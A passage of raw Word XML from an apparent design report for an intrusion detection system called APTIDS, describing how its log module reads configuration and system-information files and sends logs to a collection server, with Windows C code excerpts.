          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, </w:t>
      </w:r>
      <w:r w:rsidR="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Log Module calls a function name “Networking” for sending log to DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When APTIDS is fired up for the first time in a machine, it get</w:t>
      </w:r>
      <w:r w:rsidR="00F33A57">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> the machine’s computer name and windows version, then store them in a file called “System.info”, the content looks like:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRPr="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>## This is System Information File</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRPr="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>## You can Modify it and save with ASCII or UTF8 encoding</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRPr="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRPr="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&lt;ComputerName&gt;P3N3TR4T10N&lt;/ComputerName&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EF58FF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&lt;WindowsVersion&gt;10.0&lt;/WindowsVersion&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00EF58FF">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Networking</w:t>
      </w:r>
      <w:r w:rsidR="002565A7">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> is called by WriteLog, it defines some essential variables:</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Networking(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwLogType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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pServerIP, pPort;</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pStart, pEnd;</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dwPort;</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dwResult, dwByteRead;</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pBuffer;</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dwErrorCode;</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565A7" w:rsidRDefault="002565A7" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>pServerIp: A string for storing Server’s IP Address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">pPort: A string for storing Server’s port </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="000B77BF" w:rsidP="002565A7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dwPort: A DWORD variable for storing Server’s port, this is the number converted from pPort using “atoi” function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B77BF" w:rsidRDefault="00202D03" w:rsidP="000B77BF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Firstly, Networking reads “Networking.conf” which is a file stores information such as Server IP address and port. Networking uses this information for connecting to a server implemented in DLCH.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="00202D03" w:rsidRDefault="00202D03" w:rsidP="00202D03">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>## Networking configuration that Agent uses to connect to Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="00202D03" w:rsidRDefault="00202D03" w:rsidP="00202D03">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>## You can modify it and save it as ASCII format or UTF8 format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="00202D03" w:rsidRDefault="00202D03" w:rsidP="00202D03">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="00202D03" w:rsidRDefault="00202D03" w:rsidP="00202D03">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&lt;Server&gt;192.168.100.21&lt;/Server&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00202D03" w:rsidRPr="000B77BF" w:rsidRDefault="00202D03" w:rsidP="00202D03">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>&lt;Port&gt;55679&lt;/Port&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF58FF" w:rsidRDefault="00EF58FF" w:rsidP="00EF58FF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When we need to change the Server’s IP, we only </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00202D03">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> modify the information between “&lt;Server&gt;” and “/Server&gt;”</w:t>
      </w:r>
      <w:r w:rsidR="004827A8">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> tags, or modify the number between “&lt;Port&gt;” and “&lt;/Port&gt;” to change server port.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE0062" w:rsidRDefault="00AE0062" w:rsidP="00AE0062">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Networking then calls “SendLogToServer” passing the Server IP address and Port for connecting to DLCH.</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SendLogToServer(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>pServerIP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w: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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwPort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w: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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwLogType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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 GETTING LOCAL SYSTEM INFORMATION === //</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dwErrorCode, </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dwByteRead,</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dwResult;</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static</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">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pComputerName =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AE0062" w:rsidRDefault="00AE0062" w:rsidP="00AE0062">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pWindowsVersion;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00010AEF" w:rsidRDefault="008847F5" w:rsidP="00010AEF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">To distinguish between log data of different computers in network, we decided to store log data in files which use computer </w:t>
      </w:r>
      <w:r w:rsidR="00010AEF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>name and version as file’s name. For example, if the computer name is “P3N3TR4T10N” and its window</w:t>
      </w:r>
      <w:r w:rsidR="003A23CE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>s version is 10.0, the log file will be named “P3N3TR4T10N.</w:t>
      </w:r>
      <w:r w:rsidR="00010AEF">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>10.0.log”. Since rarely computer names are duplicated in the same LAN or Domain, this approach helps in distinguish between machines for long term, rather than based on IP address which could easily be changed due to the operation of DHCP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B5278" w:rsidRDefault="00010AEF" w:rsidP="000B5278">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>SendLogToServer reads information in “System.info” to get computer name and version. If the file does not exist or contains NULL, APTIDS stops sending that log to DLCH</w:t>
      </w:r>
      <w:r w:rsidR="000B5278">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00594D87">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> SendLogToServer calls “ParseData”, a function for getting information between the predefined tag and its appropriate ending tag.</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//Open System Infomatin File</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LPCSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> pInfoFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Config/System.info"</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hInfoFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileA(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">pInfoFile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GENERIC_READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OPEN_EXISTING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0);</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dwErrorCode = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GetLastError(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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//If file does not exist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(dwErrorCode == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ERROR_FILE_NOT_FOUND</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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lastRenderedPageBreak/>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L"Cannot open System Information file: ERROR_FILE_NOT_FOUND !\n"</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//Read from Info File</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pInfoBuffer = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>PCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">,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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CHAR</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dwResult = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ReadFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">hInfoFile, pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MAX_BUFFER_LEN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;dwByteRead,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//Close File Handle</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CloseHandle(hInfoFile);</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Check weather Config File contains NULL</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(dwByteRead == 0) {</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L"System Information file contains NULL !\n"</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xml:space="preserve">// Getting Computer Name </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pComputerName = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ParseData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;ComputerName&gt;"</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(pComputerName == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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"Computer Name was not set\n"</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Getting Windows Version</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pWindowsVersion = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ParseData(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">pInfoBuffer, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"&lt;WindowsVersion&gt;"</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(pWindowsVersion == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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"Windows Version was not set\n"</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0B5278" w:rsidRDefault="000B5278" w:rsidP="000B5278">
      <w:pPr>
        <w:rPr>
